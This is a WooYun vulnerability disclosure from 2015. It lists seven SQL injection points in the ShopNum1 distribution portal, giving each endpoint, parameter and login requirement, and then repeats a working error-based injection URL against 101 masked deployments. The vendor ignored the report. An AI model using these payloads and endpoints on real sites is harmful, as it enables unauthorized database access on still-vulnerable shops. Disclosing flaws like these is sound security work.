当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146994

漏洞标题:ShopNum1分销门户系统SQL注入7枚#大量案例证明

相关厂商:shopnum1.com

漏洞作者: 路人甲

提交时间:2015-10-21 15:07

修复时间:2016-01-24 15:10

公开时间:2016-01-24 15:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-20: 细节向核心白帽子及相关领域专家公开
2015-12-30: 细节向普通白帽子公开
2016-01-09: 细节向实习白帽子公开
2016-01-24: 细节向公众公开

简要描述:

再次诠释了这个系统的用户量

详细说明:

厂商:武汉群翔软件有限公司
产品:ShopNum1分销系统
SQL Injection:

1、/api/CheckMemberLogin.ashx?UserID=0&type=UserIsExist    UserID存在注入  #无需登录
2、/CheckEmail.aspx          CheckEmail$ctl00$txtem1 参数存在注入  #普通用户登录
3、/CheckMob.aspx            CheckMob$ctl00$txtem1 参数存在注入    #普通用户登录
4、/FindBackpayowd.aspx  FindBackpayowd$ctl00$txtem参数存在注入 #普通用户登录
5、/agentRegist.aspx     注册提交时:AgentRegist$ctl00$TextBoxMemLoginIDValue 参数存在注入 #无需登录
6、/CompanyRegist.aspx    CompanyRegist$ctl00$TextBoxMemLoginIDValue参数存在注入 #无需登录
7、/MemberRegist.aspx    注册提交时:MemberRegist%24ctl00%24TextBoxMemLoginIDValue参数存在注入 #无需登录


以第一个注入附上100个案例证明(案例已打码):

mask 区域 
1.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
2.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
3.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
4.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
5.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
6.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
7.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
8.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
9.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
10.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
11.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
12.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
13.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
14.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
15.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
16.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
17.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
18.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
19.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
20.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
21.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
22.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
23.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
24.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
25.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
26.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
27.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
28.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
29.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
30.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
31.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
32.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
33.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
34.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
35.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
36.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
37.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
38.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
39.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
40.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
41.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
42.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
43.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
44.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
45.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
46.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
47.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
48.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
49.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
50.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
51.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
52.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
53.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
54.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
55.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
56.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
57.http://**.**.**//api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
58.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
59.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
60.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
61.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
62.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
63.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
64.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
65.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
66.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
67.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
68.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
69.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
70.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
71.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
72.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
73.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
74.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
75.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
76.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
77.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
78.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
79.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
80.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
81.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
82.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
83.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
84.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
85.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
86.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
87.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
88.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
89.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
90.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
91.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
92.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
93.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
94.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
95.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
96.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
97.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
98.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
99.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
100.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_
101.http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist

漏洞证明:

Security Testing:
本页漏洞内容仅为漏洞报告交由CNCERT/CNVD通知厂商处理或直接通知厂商处理,并非利用方法,请勿仿照漏洞报告进行恶意攻击入侵站点,由此带来的后果,漏洞作者概不负责!

1、/api/CheckMemberLogin.ashx?UserID=0%27%20and%20@@version%3E0--&type=UserIsExist
01.jpg




2、在/memberlogin.aspx注册用户之后,访问:/CheckEmail.aspx



02.jpg







03.jpg




3、在/memberlogin.aspx注册用户之后,访问:/CheckMob.aspx  



04.jpg







05.jpg




4、在/memberlogin.aspx注册用户之后,/FindBackpayowd.aspx 



06.jpg







07.jpg




5、/agentRegist.aspx 注册提交的时候:



08.jpg




6、/CompanyRegist.aspx 注册提交的时候:



09.jpg




7、在页面:/MemberRegist.html 注册提交的时候:



10.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-24 15:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无